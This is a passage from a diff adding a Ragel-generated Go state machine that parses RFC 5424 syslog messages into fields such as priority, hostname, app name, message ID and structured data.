258: + goto st_case_258 + case 259: + goto st_case_259 + case 260: + goto st_case_260 + case 261: + goto st_case_261 + case 262: + goto st_case_262 + case 263: + goto st_case_263 + case 264: + goto st_case_264 + case 265: + goto st_case_265 + case 266: + goto st_case_266 + case 267: + goto st_case_267 + case 268: + goto st_case_268 + case 269: + goto st_case_269 + case 270: + goto st_case_270 + case 271: + goto st_case_271 + case 272: + goto st_case_272 + case 273: + goto st_case_273 + case 274: + goto st_case_274 + 
case 275: + goto st_case_275 + case 276: + goto st_case_276 + case 277: + goto st_case_277 + case 278: + goto st_case_278 + case 279: + goto st_case_279 + case 280: + goto st_case_280 + case 281: + goto st_case_281 + case 282: + goto st_case_282 + case 283: + goto st_case_283 + case 284: + goto st_case_284 + case 285: + goto st_case_285 + case 286: + goto st_case_286 + case 287: + goto st_case_287 + case 288: + goto st_case_288 + case 289: + goto st_case_289 + case 290: + goto st_case_290 + case 291: + goto st_case_291 + case 292: + goto st_case_292 + case 293: + goto st_case_293 + case 294: + goto st_case_294 + case 295: + goto st_case_295 + case 296: + goto st_case_296 + case 297: + goto st_case_297 + case 298: + goto st_case_298 + case 299: + goto st_case_299 + case 300: + goto st_case_300 + case 301: + goto st_case_301 + case 302: + goto st_case_302 + case 303: + goto st_case_303 + case 304: + goto st_case_304 + case 305: + goto st_case_305 + case 306: + goto st_case_306 + case 307: + goto st_case_307 + case 308: + goto st_case_308 + case 309: + goto st_case_309 + case 310: + goto st_case_310 + case 311: + goto st_case_311 + case 312: + goto st_case_312 + case 313: + goto st_case_313 + case 314: + goto st_case_314 + case 315: + goto st_case_315 + case 316: + goto st_case_316 + case 317: + goto st_case_317 + case 318: + goto st_case_318 + case 319: + goto st_case_319 + case 320: + goto st_case_320 + case 321: + goto st_case_321 + case 322: + goto st_case_322 + case 323: + goto st_case_323 + case 324: + goto st_case_324 + case 325: + goto st_case_325 + case 326: + goto st_case_326 + case 327: + goto st_case_327 + case 328: + goto st_case_328 + case 329: + goto st_case_329 + case 330: + goto st_case_330 + case 331: + goto st_case_331 + case 332: + goto st_case_332 + case 333: + goto st_case_333 + case 334: + goto st_case_334 + case 335: + goto st_case_335 + case 336: + goto st_case_336 + case 337: + goto st_case_337 + case 338: + goto st_case_338 + case 339: + 
goto st_case_339 + case 340: + goto st_case_340 + case 341: + goto st_case_341 + case 342: + goto st_case_342 + case 343: + goto st_case_343 + case 344: + goto st_case_344 + case 345: + goto st_case_345 + case 346: + goto st_case_346 + case 347: + goto st_case_347 + case 348: + goto st_case_348 + case 349: + goto st_case_349 + case 350: + goto st_case_350 + case 351: + goto st_case_351 + case 352: + goto st_case_352 + case 353: + goto st_case_353 + case 354: + goto st_case_354 + case 355: + goto st_case_355 + case 356: + goto st_case_356 + case 357: + goto st_case_357 + case 358: + goto st_case_358 + case 359: + goto st_case_359 + case 360: + goto st_case_360 + case 361: + goto st_case_361 + case 362: + goto st_case_362 + case 363: + goto st_case_363 + case 364: + goto st_case_364 + case 365: + goto st_case_365 + case 366: + goto st_case_366 + case 367: + goto st_case_367 + case 368: + goto st_case_368 + case 369: + goto st_case_369 + case 370: + goto st_case_370 + case 371: + goto st_case_371 + case 372: + goto st_case_372 + case 373: + goto st_case_373 + case 374: + goto st_case_374 + case 375: + goto st_case_375 + case 376: + goto st_case_376 + case 377: + goto st_case_377 + case 378: + goto st_case_378 + case 379: + goto st_case_379 + case 380: + goto st_case_380 + case 381: + goto st_case_381 + case 382: + goto st_case_382 + case 383: + goto st_case_383 + case 384: + goto st_case_384 + case 385: + goto st_case_385 + case 386: + goto st_case_386 + case 387: + goto st_case_387 + case 388: + goto st_case_388 + case 389: + goto st_case_389 + case 390: + goto st_case_390 + case 391: + goto st_case_391 + case 392: + goto st_case_392 + case 393: + goto st_case_393 + case 394: + goto st_case_394 + case 395: + goto st_case_395 + case 396: + goto st_case_396 + case 397: + goto st_case_397 + case 398: + goto st_case_398 + case 399: + goto st_case_399 + case 400: + goto st_case_400 + case 401: + goto st_case_401 + case 402: + goto st_case_402 + case 403: + goto 
st_case_403 + case 404: + goto st_case_404 + case 405: + goto st_case_405 + case 406: + goto st_case_406 + case 407: + goto st_case_407 + case 408: + goto st_case_408 + case 409: + goto st_case_409 + case 410: + goto st_case_410 + case 411: + goto st_case_411 + case 412: + goto st_case_412 + case 413: + goto st_case_413 + case 414: + goto st_case_414 + case 415: + goto st_case_415 + case 416: + goto st_case_416 + case 417: + goto st_case_417 + case 418: + goto st_case_418 + case 419: + goto st_case_419 + case 420: + goto st_case_420 + case 421: + goto st_case_421 + case 422: + goto st_case_422 + case 423: + goto st_case_423 + case 424: + goto st_case_424 + case 425: + goto st_case_425 + case 426: + goto st_case_426 + case 427: + goto st_case_427 + case 428: + goto st_case_428 + case 429: + goto st_case_429 + case 430: + goto st_case_430 + case 431: + goto st_case_431 + case 432: + goto st_case_432 + case 433: + goto st_case_433 + case 434: + goto st_case_434 + case 435: + goto st_case_435 + case 436: + goto st_case_436 + case 437: + goto st_case_437 + case 438: + goto st_case_438 + case 439: + goto st_case_439 + case 440: + goto st_case_440 + case 441: + goto st_case_441 + case 442: + goto st_case_442 + case 443: + goto st_case_443 + case 444: + goto st_case_444 + case 445: + goto st_case_445 + case 446: + goto st_case_446 + case 447: + goto st_case_447 + case 448: + goto st_case_448 + case 449: + goto st_case_449 + case 450: + goto st_case_450 + case 451: + goto st_case_451 + case 452: + goto st_case_452 + case 453: + goto st_case_453 + case 454: + goto st_case_454 + case 455: + goto st_case_455 + case 456: + goto st_case_456 + case 457: + goto st_case_457 + case 458: + goto st_case_458 + case 459: + goto st_case_459 + case 460: + goto st_case_460 + case 461: + goto st_case_461 + case 462: + goto st_case_462 + case 463: + goto st_case_463 + case 464: + goto st_case_464 + case 465: + goto st_case_465 + case 466: + goto st_case_466 + case 467: + goto st_case_467 + 
case 468: + goto st_case_468 + case 469: + goto st_case_469 + case 470: + goto st_case_470 + case 471: + goto st_case_471 + case 472: + goto st_case_472 + case 473: + goto st_case_473 + case 474: + goto st_case_474 + case 475: + goto st_case_475 + case 476: + goto st_case_476 + case 477: + goto st_case_477 + case 478: + goto st_case_478 + case 479: + goto st_case_479 + case 480: + goto st_case_480 + case 481: + goto st_case_481 + case 482: + goto st_case_482 + case 483: + goto st_case_483 + case 484: + goto st_case_484 + case 485: + goto st_case_485 + case 486: + goto st_case_486 + case 487: + goto st_case_487 + case 488: + goto st_case_488 + case 489: + goto st_case_489 + case 490: + goto st_case_490 + case 491: + goto st_case_491 + case 492: + goto st_case_492 + case 493: + goto st_case_493 + case 494: + goto st_case_494 + case 495: + goto st_case_495 + case 496: + goto st_case_496 + case 497: + goto st_case_497 + case 498: + goto st_case_498 + case 499: + goto st_case_499 + case 500: + goto st_case_500 + case 501: + goto st_case_501 + case 502: + goto st_case_502 + case 503: + goto st_case_503 + case 504: + goto st_case_504 + case 505: + goto st_case_505 + case 506: + goto st_case_506 + case 507: + goto st_case_507 + case 508: + goto st_case_508 + case 509: + goto st_case_509 + case 510: + goto st_case_510 + case 511: + goto st_case_511 + case 512: + goto st_case_512 + case 513: + goto st_case_513 + case 514: + goto st_case_514 + case 515: + goto st_case_515 + case 516: + goto st_case_516 + case 517: + goto st_case_517 + case 518: + goto st_case_518 + case 519: + goto st_case_519 + case 520: + goto st_case_520 + case 521: + goto st_case_521 + case 522: + goto st_case_522 + case 523: + goto st_case_523 + case 524: + goto st_case_524 + case 525: + goto st_case_525 + case 526: + goto st_case_526 + case 527: + goto st_case_527 + case 528: + goto st_case_528 + case 529: + goto st_case_529 + case 530: + goto st_case_530 + case 531: + goto st_case_531 + case 532: + 
goto st_case_532 + case 533: + goto st_case_533 + case 534: + goto st_case_534 + case 535: + goto st_case_535 + case 536: + goto st_case_536 + case 537: + goto st_case_537 + case 538: + goto st_case_538 + case 539: + goto st_case_539 + case 540: + goto st_case_540 + case 541: + goto st_case_541 + case 542: + goto st_case_542 + case 543: + goto st_case_543 + case 544: + goto st_case_544 + case 545: + goto st_case_545 + case 546: + goto st_case_546 + case 547: + goto st_case_547 + case 548: + goto st_case_548 + case 549: + goto st_case_549 + case 550: + goto st_case_550 + case 551: + goto st_case_551 + case 552: + goto st_case_552 + case 553: + goto st_case_553 + case 554: + goto st_case_554 + case 555: + goto st_case_555 + case 556: + goto st_case_556 + case 557: + goto st_case_557 + case 558: + goto st_case_558 + case 559: + goto st_case_559 + case 560: + goto st_case_560 + case 561: + goto st_case_561 + case 562: + goto st_case_562 + case 563: + goto st_case_563 + case 564: + goto st_case_564 + case 565: + goto st_case_565 + case 566: + goto st_case_566 + case 567: + goto st_case_567 + case 568: + goto st_case_568 + case 569: + goto st_case_569 + case 570: + goto st_case_570 + case 571: + goto st_case_571 + case 572: + goto st_case_572 + case 573: + goto st_case_573 + case 574: + goto st_case_574 + case 575: + goto st_case_575 + case 576: + goto st_case_576 + case 577: + goto st_case_577 + case 578: + goto st_case_578 + case 579: + goto st_case_579 + case 580: + goto st_case_580 + case 581: + goto st_case_581 + case 582: + goto st_case_582 + case 583: + goto st_case_583 + case 584: + goto st_case_584 + case 585: + goto st_case_585 + case 586: + goto st_case_586 + } + goto st_out + st_case_1: + if data[(p)] == 60 { + goto st2 + } + goto st0 + st_case_0: + st0: + cs = 0 + goto _out + st2: + if (p)++; (p) == (pe) { + goto _test_eof2 + } + st_case_2: + switch data[(p)] { + case 48: + goto tr2 + case 49: + goto tr3 + } + if 50 <= data[(p)] && data[(p)] <= 57 { + goto 
tr4 + } + goto st0 + tr2: +//line parser/common.rl:3 + + tok = p + + goto st3 + st3: + if (p)++; (p) == (pe) { + goto _test_eof3 + } + st_case_3: +//line rfc5424_parser.go:1264 + if data[(p)] == 62 { + goto tr5 + } + goto st0 + tr5: +//line parser/common.rl:7 + + event.SetPriority(data[tok:p]) + + goto st4 + st4: + if (p)++; (p) == (pe) { + goto _test_eof4 + } + st_case_4: +//line rfc5424_parser.go:1280 + if 49 <= data[(p)] && data[(p)] <= 57 { + goto tr6 + } + goto st0 + tr6: +//line parser/common.rl:3 + + tok = p + + goto st5 + st5: + if (p)++; (p) == (pe) { + goto _test_eof5 + } + st_case_5: +//line rfc5424_parser.go:1296 + if data[(p)] == 32 { + goto tr7 + } + if 48 <= data[(p)] && data[(p)] <= 57 { + goto st582 + } + goto st0 + tr7: +//line parser/common.rl:111 + + event.SetVersion(data[tok:p]) + + goto st6 + st6: + if (p)++; (p) == (pe) { + goto _test_eof6 + } + st_case_6: +//line rfc5424_parser.go:1315 + if data[(p)] == 45 { + goto st7 + } + if 48 <= data[(p)] && data[(p)] <= 57 { + goto tr10 + } + goto st0 + tr579: +//line parser/common.rl:39 + + event.SetSecond(data[tok:p]) + + goto st7 + tr589: +//line parser/common.rl:43 + + event.SetNanosecond(data[tok:p]) + + goto st7 + st7: + if (p)++; (p) == (pe) { + goto _test_eof7 + } + st_case_7: +//line rfc5424_parser.go:1340 + if data[(p)] == 32 { + goto st8 + } + goto st0 + tr585: +//line parser/common.rl:103 + + event.SetTimeZone(data[tok:p]) + + goto st8 + st8: + if (p)++; (p) == (pe) { + goto _test_eof8 + } + st_case_8: +//line rfc5424_parser.go:1356 + if 33 <= data[(p)] && data[(p)] <= 126 { + goto tr12 + } + goto st0 + tr12: +//line parser/common.rl:3 + + tok = p + + goto st9 + st9: + if (p)++; (p) == (pe) { + goto _test_eof9 + } + st_case_9: +//line rfc5424_parser.go:1372 + if data[(p)] == 32 { + goto tr13 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st293 + } + goto st0 + tr13: +//line parser/common.rl:91 + + event.SetHostname(data[tok:p]) + + goto st10 + st10: + if (p)++; (p) == (pe) { + goto 
_test_eof10 + } + st_case_10: +//line rfc5424_parser.go:1391 + if 33 <= data[(p)] && data[(p)] <= 126 { + goto tr15 + } + goto st0 + tr15: +//line parser/common.rl:3 + + tok = p + + goto st11 + st11: + if (p)++; (p) == (pe) { + goto _test_eof11 + } + st_case_11: +//line rfc5424_parser.go:1407 + if data[(p)] == 32 { + goto tr16 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st246 + } + goto st0 + tr16: +//line parser/common.rl:115 + + event.SetAppName(data[tok:p]) + + goto st12 + st12: + if (p)++; (p) == (pe) { + goto _test_eof12 + } + st_case_12: +//line rfc5424_parser.go:1426 + if 33 <= data[(p)] && data[(p)] <= 126 { + goto tr18 + } + goto st0 + tr18: +//line parser/common.rl:3 + + tok = p + + goto st13 + st13: + if (p)++; (p) == (pe) { + goto _test_eof13 + } + st_case_13: +//line rfc5424_parser.go:1442 + if data[(p)] == 32 { + goto tr19 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st119 + } + goto st0 + tr19: +//line parser/common.rl:119 + + event.SetProcID(data[tok:p]) + + goto st14 + st14: + if (p)++; (p) == (pe) { + goto _test_eof14 + } + st_case_14: +//line rfc5424_parser.go:1461 + if 33 <= data[(p)] && data[(p)] <= 126 { + goto tr21 + } + goto st0 + tr21: +//line parser/common.rl:3 + + tok = p + + goto st15 + st15: + if (p)++; (p) == (pe) { + goto _test_eof15 + } + st_case_15: +//line rfc5424_parser.go:1477 + if data[(p)] == 32 { + goto tr22 + } + if 33 <= data[(p)] && data[(p)] <= 126 { + goto st88 + } + goto st0 + tr22: +//line parser/common.rl:123 + + event.SetMsgID(data[tok:p]) + + goto st16 + st16: + if (p)++; (p) == (pe) { + goto _test_eof16 + } + st_case_16: +//line rfc5424_parser.go:1496 + switch data[(p)] { + case 45: + goto st587 + case 91: + goto tr25 + } + goto st0 + st587: + if (p)++; (p) == (pe) { + goto _test_eof587 + } + st_case_587: + if data[(p)] == 32 { + goto st588 + } + goto st0 + st588: + if (p)++; (p) == (pe) { + goto _test_eof588 + } + st_case_588: + goto tr599 + tr599: +//line parser/common.rl:3 + + tok = p + + goto 
st589 + st589: + if (p)++; (p) == (pe) { + goto _test_eof589 + } + st_case_589: +//line rfc5424_parser.go:1530 + goto st589 + tr25: +//line parser/common.rl:48 + + event.data = EventData{} + + goto st17 + st17: + if (p)++; (p) == (pe) { + goto _test_eof17 + } + st_case_17: +//line rfc5424_parser.go:1543 + if data[(p)] == 33 { + goto tr26 + } + switch { + case data[(p)] < 62: + if 35 <= data[(p)] && data[(p)] <= 60 { + goto tr26 + } + case data[(p)] > 92: + if 94 <= data[(p)] && data[(p)] <= 126 { + goto tr26 + } + default: + goto tr26 + } + goto st0 + tr26: +//line parser/common.rl:3 + + tok = p + + goto st18 + st18: + if (p)++; (p) == (pe) { + goto _test_eof18 + } + st_case_18: +//line rfc5424_parser.go:1571 + switch data[(p)] { + case 32: + goto tr27 + case 33: + goto st57 + case 93: + goto tr29 + } + switch { + case data[(p)] > 60: + if 62 <= data[(p)] && data[(p)] <= 126 { + goto st57 + } + case data[(p)] >= 35: + goto st57 + } + goto st0 + tr27: +//line parser/common.rl:64 + + state.sd_id = string(data[tok:p]) + if _, ok := event.data[state.sd_id]; ok { + (p)-- + + } else { + event.data[state.sd_id] = map[string]string{} + } + + goto st19 + st19: + if (p)++; (p) == (pe) { + goto _test_eof19 + } + st_case_19: +//line rfc5424_parser.go:1606 + if data[(p)] == 33 { + goto tr30 + } + switch { + case data[(p)] < 62: + if 35 <= data[(p)] && data[(p)] <= 60 { + goto tr30 + } + case data[(p)] > 92: + if 94 <= data[(p)] && data[(p)] <= 126 { + goto tr30 + } + default: + goto tr30 + } + goto st0 + tr30: +//line parser/common.rl:3 + + tok = p + + goto st20 + st20: + if (p)++; (p) == (pe) { + goto _test_eof20 + } + st_case_20: +//line rfc5424_parser.go:1634 + switch data[(p)] { + case 33: + goto st21 + case 61: + goto tr32 + } + switch { + case data[(p)] > 92: + if 94 <= data[(p)] && data[(p)] <= 126 { + goto st21 + } + case data[(p)] >= 35: + goto st21 + } + goto st0 + st21: + if (p)++; (p) == (pe) { + goto _test_eof21 + } + st_case_21: + switch data[(p)] { + case 33: + 
goto st22 + case 61: + goto tr32 + } + switch { + case data[(p)] > 92: + if 94 <= data[(p)] && data[(p)] <= 126 { + goto st22 + } + case data[(p)] >= 35: + goto st22 + } + goto st0 + st22: + if (p)++; (p) == (pe) { + goto _test_eof22 + } + st_case_22: + switch data[(p)] { + case 33: + goto st23 + case 61: + goto tr32 + } + switch { + case data[(p)] > 92: + if 94 <= data[(p)] && data[(p)] <= 126 { + goto st23 + } + case data[(p)] >= 35: + goto st23 + } + goto st0 + st23: + if (p)++; (p) == (pe) { + goto _test_eof23 + } + st_case_23: + switch data[(p)] { + case 33: + goto st24 + case 61: + goto tr32 + } + switch { + case data[(p)] > 92: + if 94 <= data[(p)] && data[(p)] <= 126 { + goto st24 + } + case data[(p)] >= 35: + goto st24 + } + goto st0 + st24: + if (p)++; (p) == (pe) { + goto _test_eof24 + } + st_case_24: + switch data[(p)] { + case 33: + goto st25 + case 61: + goto tr32 + } + switch { + case data[(p)] > 92: + if 94 <= data[(p)] && data[(p)] <= 126 { + goto st25 + } + case data[(p)] >= 35: + goto st25 + } + goto st0 + st25: + if (p)++; (p) == (pe) { + goto _test_eof25 + } + st_case_25: + switch data[(p)] { + case 33: + goto st26 + case 61: + goto tr32 + } + switch { + case data[(p)] > 92: + if 94 <= data[(p)] && data[(p)] <= 126 { + goto st26 + } + case data[(p)] >= 35: + goto st26 + } + goto st0 + st26: + if (p)++; (p) == (pe) { + goto _test_eof26 + } + st_case_26: + switch data[(p)] { + case 33: + goto st27 + case 61: + goto tr32 + } + switch { + case data[(p)] > 92: + if 94 <= data[(p)] && data[(p)] <= 126 { + goto st27 + } + case data[(p)] >= 35: + goto st27 + } + goto st0 + st27: + if (p)++; (p) == (pe) { + goto _test_eof27 + } + st_case_27: + switch data[(p)] { + case 33: + goto st28 + case 61: + goto tr32 + } + switch { + case data[(p)] > 92: + if 94 <= data[(p)] && data[(p)] <= 126 { + goto st28 + } + case data[(p)] >= 35: + goto st28 + } + goto st0 + st28: + if (p)++; (p) == (pe) { + goto _test_eof28 + } + st_case_28: + switch data[(p)] { + case 33: 
+ goto st29 + case 61: + goto tr32 + } + switch { + case data[(p)] > 92: + if 94 <= data[(p)] && data[(p)] <= 126 { + goto st29 + } + case data[(p)] >= 35: + goto st29 + } + goto st0 + st29: + if (p)++; (p) == (pe) { + goto _test_eof29 + } + st_case_29: + switch data[(p)] { + case 33: + goto st30 + case 61: + goto tr32 + } + switch { + case data[(p)] > 92: + if 94 <= data[(p)] && data[(p)] <= 126 { + goto st30 + } + case data[(p)] >= 35: + goto st30 + } + goto st0 + st30: + if (p)++; (p) == (pe) { + goto _test_eof30 + } + st_case_30: + switch data[(p)] { + case 33: + goto st31 + case 61: + goto tr32 + } + switch { + case data[(p)] > 92: + if 94 <= data[(p)] && data[(p)] <= 126 { + goto st31 + } + case data[(p)] >= 35: + goto st31 + } + goto st0 + st31: + if (p)++; (p) == (pe) { + goto _test_eof31 + } + st_case_31: + switch data[(p)] { + case 33: + goto st32 + case 61: + goto tr32 + } + switch { + case data[(p)] > 92: + if 94 <= data[(p)] && data[(p)] <= 126 { + goto st32 + } + case data[(p)] >= 35: + goto st32 + } + goto st0 + st32: + if (p)++; (p) == (pe) { + goto _test_eof32 + } + st_case_32: + switch data[(p)] { + case 33: + goto st33 + case 61: + goto tr32 + } + switch { + case data[(p)] > 92: + if 94 <= data[(p)] && data[(p)] <= 126 { + goto st33 + } + case data[(p)] >= 35: + goto st33 + } + goto st0 + st33: + if (p)++; (p) == (pe) { + goto _test_eof33 + } + st_case_33: + switch data[(p)] { + case 33: + goto st34 + case 61: + goto tr32 + } + switch { + case data[(p)] > 92: + if 94 <= data[(p)] && data[(p)] <= 126 { + goto st34 + } + case data[(p)] >= 35: + goto st34 + } + goto st0 + st34: + if (p)++; (p) == (pe) { + goto _test_eof34 + } + st_case_34: + switch data[(p)] { + case 33: + goto st35 + case 61: + goto tr32 + } + switch { + case data[(p)] > 92: + if 94 <= data[(p)] && data[(p)] <= 126 { + goto st35 + } + case data[(p)] >= 35: + goto st35 + } + goto st0 + st35: + if (p)++; (p) == (pe) { + goto _test_eof35 + } + st_case_35: + switch data[(p)] { + case 
33: + goto st36 + case 61: + goto tr32 + } + switch { + case data[(p)] > 92: + if 94 <= data[(p)] && data[(p)] <= 126 { + goto st36 + } + case data[(p)] >= 35: + goto st36 + } + goto st0 + st36: + if (p)++; (p) == (pe) { + goto _test_eof36 + } + st_case_36: + switch data[(p)] { + case 33: + goto st37 + case 61: + goto tr32 + } + switch { + case data[(p)] > 92: + if 94 <= data[(p)] && data[(p)] <= 126 { + goto st37 + } + case data[(p)] >= 35: + goto st37 + } + goto st0 + st37: + if (p)++; (p) == (pe) { + goto _test_eof37 + } + st_case_37: + switch data[(p)] { + case 33: + goto st38 + case 61: + goto tr32 + } + switch { + case data[(p)] > 92: + if 94 <= data[(p)] && data[(p)] <= 126 { + goto st38 + } + case data[(p)] >= 35: + goto st38 + } + goto st0 + st38: + if (p)++; (p) == (pe) { + goto _test_eof38 + } + st_case_38: + switch data[(p)] { + case 33: + goto st39 + case 61: + goto tr32 + } + switch { + case data[(p)] > 92: + if 94 <= data[(p)] && data[(p)] <= 126 { + goto st39 + } + case data[(p)] >= 35: + goto st39 + } + goto st0 + st39: + if (p)++; (p) == (pe) { + goto _test_eof39 + } + st_case_39: + switch data[(p)] { + case 33: + goto st40 + case 61: + goto tr32 + } + switch { + case data[(p)] > 92: + if 94 <= data[(p)] && data[(p)] <= 126 { + goto st40 + } + case data[(p)] >= 35: + goto st40 + } + goto st0 + st40: + if (p)++; (p) == (pe) { + goto _test_eof40 + } + st_case_40: + switch data[(p)] { + case 33: + goto st41 + case 61: + goto tr32 + } + switch { + case data[(p)] > 92: + if 94 <= data[(p)] && data[(p)] <= 126 { + goto st41 + } + case data[(p)] >= 35: + goto st41 + } + goto st0 + st41: + if (p)++; (p) == (pe) { + goto _test_eof41 + } + st_case_41: + switch data[(p)] { + case 33: + goto st42 + case 61: + goto tr32 + } + switch { + case data[(p)] > 92: + if 94 <= data[(p)] && data[(p)] <= 126 { + goto st42 + } + case data[(p)] >= 35: + goto st42 + } + goto st0 + st42: + if (p)++; (p) == (pe) { + goto _test_eof42 + } + st_case_42: + switch data[(p)] { + 
case 33: + goto st43 + case 61: + goto tr32 + } + switch { + case data[(p)] > 92: + if 94 <= data[(p)] && data[(p)] <= 126 { + goto st43 + } + case data[(p)] >= 35: + goto st43 + } + goto st0 + st43: + if (p)++; (p) == (pe) { + goto _test_eof43 + } + st_case_43: + switch data[(p)] { + case 33: + goto st44 + case 61: + goto tr32 + } + switch { + case data[(p)] > 92: + if 94 <= data[(p)] && data[(p)] <= 126 { + goto st44 + } + case data[(p)] >= 35: + goto st44 + } + goto st0 + st44: + if (p)++; (p) == (pe) { + goto _test_eof44 + } + st_case_44: + switch data[(p)] { + case 33: + goto st45 + case 61: + goto tr32 + } + switch { + case data[(p)] > 92: + if 94 <= data[(p)] && data[(p)] <= 126 { + goto st45 + } + case data[(p)] >= 35: + goto st45 + } + goto st0 + st45: + if (p)++; (p) == (pe) { + goto _test_eof45 + } + st_case_45: + switch data[(p)] { + case 33: + goto st46 + case 61: + goto tr32 + } + switch { + case data[(p)] > 92: + if 94 <= data[(p)] && data[(p)] <= 126 { + goto st46 + } + case data[(p)] >= 35: + goto st46 + } + goto st0 + st46: + if (p)++; (p) == (pe) { + goto _test_eof46 + } + st_case_46: + switch data[(p)] { + case 33: + goto st47 + case 61: + goto tr32 + } + switch { + case data[(p)] > 92: + if 94 <= data[(p)] && data[(p)] <= 126 { + goto st47 + } + case data[(p)] >= 35: + goto st47 + } + goto st0 + st47: + if (p)++; (p) == (pe) { + goto _test_eof47 + } + st_case_47: + switch data[(p)] { + case 33: + goto st48 + case 61: + goto tr32 + } + switch { + case data[(p)] > 92: + if 94 <= data[(p)] && data[(p)] <= 126 { + goto st48 + } + case data[(p)] >= 35: + goto st48 + } + goto st0 + st48: + if (p)++; (p) == (pe) { + goto _test_eof48 + } + st_case_48: + switch data[(p)] { + case 33: + goto st49 + case 61: + goto tr32 + } + switch { + case data[(p)] > 92: + if 94 <= data[(p)] && data[(p)] <= 126 { + goto st49 + } + case data[(p)] >= 35: + goto st49 + } + goto st0 + st49: + if (p)++; (p) == (pe) { + goto _test_eof49 + } + st_case_49: + switch data[(p)] { 
+ case 33: + goto st50 + case 61: + goto tr32 + } + switch { + case data[(p)] > 92: + if 94 <= data[(p)] && data[(p)] <= 126 { + goto st50 + } + case data[(p)] >= 35: + goto st50 + } + goto st0 + st50: + if (p)++; (p) == (pe) { + goto _test_eof50 + } + st_case_50: + switch data[(p)] { + case 33: + goto st51 + case 61: + goto tr32 + } + switch { + case data[(p)] > 92: + if 94 <= data[(p)] && data[(p)] <= 126 { + goto st51 + } + case data[(p)] >= 35: + goto st51 + } + goto st0 + st51: + if (p)++; (p) == (pe) { + goto _test_eof51 + } + st_case_51: + if data[(p)] == 61 { + goto tr32 + } + goto st0 + tr32: +//line parser/common.rl:56 + + state.sd_param_name = string(data[tok:p]) + + goto st52 + st52: + if (p)++; (p) == (pe) { + goto _test_eof52 + } + st_case_52: +//line rfc5424_parser.go:2270 + if data[(p)] == 34 { + goto st53 + } + goto st0 + st53: + if (p)++; (p) == (pe) { + goto _test_eof53 + } + st_case_53: + switch data[(p)] { + case 34: + goto st0 + case 92: + goto tr65 + case 93: + goto st0 + } + goto tr64 + tr64: +//line parser/common.rl:3 + + tok = p + + goto st54 + st54: + if (p)++; (p) == (pe) { + goto _test_eof54 + } + st_case_54: +//line rfc5424_parser.go:2300 + switch data[(p)] { + case 34: + goto tr67 + case 92: + goto tr68 + case 93: + goto st0 + } + goto st54 + tr67: +//line parser/common.rl:60 + + event.SetData(state.sd_id, state.sd_param_name, data, tok, p, state.sd_value_bs) + +//line parser/common.rl:52 + + state.sd_value_bs = []int{} + + goto st55 + st55: + if (p)++; (p) == (pe) { + goto _test_eof55 + } + st_case_55: +//line rfc5424_parser.go:2325 + switch data[(p)] { + case 32: + goto st19 + case 33: + goto tr30 + case 93: + goto st590 + } + switch { + case data[(p)] > 60: + if 62 <= data[(p)] && data[(p)] <= 126 { + goto tr30 + } + case data[(p)] >= 35: + goto tr30 + } + goto st0 + tr29: +//line parser/common.rl:64 + + state.sd_id = string(data[tok:p]) + if _, ok := event.data[state.sd_id]; ok { + (p)-- + + } else { + event.data[state.sd_id] = 
map[string]string{} + } + + goto st590 + st590: + if (p)++; (p) == (pe) { + goto _test_eof590 + } + st_case_590: +//line rfc5424_parser.go:2360 + switch data[(p)] { + case 32: + goto st588 + case 91: + goto st17 + } + goto st0 + tr65: +//line parser/common.rl:3 + + tok = p + +//line parser/common.rl:73 + + state.sd_value_bs = append(state.sd_value_bs, p) + + goto st56 + tr68: +//line parser/common.rl:73 + + state.sd_value_bs = append(state.sd_value_bs, p) + + goto st56 + st56: + if (p)++; (p) == (pe) { + goto _test_eof56 + } + st_case_56: +//line rfc5424_parser.go:2389 + if data[(p)] == 34 { + goto st54 + } + if 92 <= data[(p)] && data[(p)] <= 93 { + goto st54 + } + goto st0 + st57: + if (p)++; (p) == (pe) { + goto _test_eof57 + } + st_case_57: + switch data[(p)] { + case 32: + goto tr27 + case 33: + goto st58 + case 93: + goto tr29 + } + switch { + case data[(p)] > 60: + if 62 <= data[(p)] && data[(p)] <= 126 { + goto st58 + } + case data[(p)] >= 35: + goto st58 + } + goto st0 + st58: + if (p)++; (p) == (pe) { + goto _test_eof58 + } + st_case_58: + switch data[(p)] { + case 32: + goto tr27 + case 33: + goto st59 + case 93: + goto tr29 + } + switch { + case data[(p)] > 60: + if 62 <= data[(p)] && data[(p)] <= 126 { + goto st59 + } + case data[(p)] >= 35: + goto st59 + } + goto st0 + st59: + if (p)++; (p) == (pe) { + goto _test_eof59 + } + st_case_59: + switch data[(p)] { + case 32: + goto tr27 + case 33: + goto st60 + case 93: + goto tr29 + } + switch { + case data[(p)] > 60: + if 62 <= data[(p)] && data[(p)] <= 126 { + goto st60 + } + case data[(p)] >= 35: + goto st60 + } + goto st0 + st60: + if (p)++; (p) == (pe) { + goto _test_eof60 + } + st_case_60: + switch data[(p)] { + case 32: + goto tr27 + case 33: + goto st61 + case 93: + goto tr29 + } + switch { + case data[(p)] > 60: + if 62 <= data[(p)] && data[(p)] <= 126 { + goto st61 + } + case data[(p)] >= 35: + goto st61 + } + goto st0 + st61: + if (p)++; (p) == (pe) { + goto _test_eof61 + } + st_case_61: + switch 
data[(p)] { + case 32: + goto tr27 + case 33: + goto st62 + case 93: + goto tr29 + } + switch { + case data[(p)] > 60: + if 62 <= data[(p)] && data[(p)] <= 126 { + goto st62 + } + case data[(p)] >= 35: + goto st62 + } + goto st0 + st62: + if (p)++; (p) == (pe) { + goto _test_eof62 + } + st_case_62: + switch data[(p)] { + case 32: + goto tr27 + case 33: + goto st63 + case 93: + goto tr29 + } + switch { + case data[(p)] > 60: + if 62 <= data[(p)] && data[(p)] <= 126 { + goto st63 + } + case data[(p)] >= 35: + goto st63 + } + goto st0 + st63: + if (p)++; (p) == (pe) { + goto _test_eof63 + } + st_case_63: + switch data[(p)] { + case 32: + goto tr27 + case 33: + goto st64 + case 93: + goto tr29 + } + switch { + case data[(p)] > 60: + if 62 <= data[(p)] && data[(p)] <= 126 { + goto st64 + } + case data[(p)] >= 35: + goto st64 + } + goto st0 + st64: + if (p)++; (p) == (pe) { + goto _test_eof64 + } + st_case_64: + switch data[(p)] { + case 32: + goto tr27 + case 33: + goto st65 + case 93: + goto tr29 + } + switch { + case data[(p)] > 60: + if 62 <= data[(p)] && data[(p)] <= 126 { + goto st65 + } + case data[(p)] >= 35: + goto st65 + } + goto st0 + st65: + if (p)++; (p) == (pe) { + goto _test_eof65 + } + 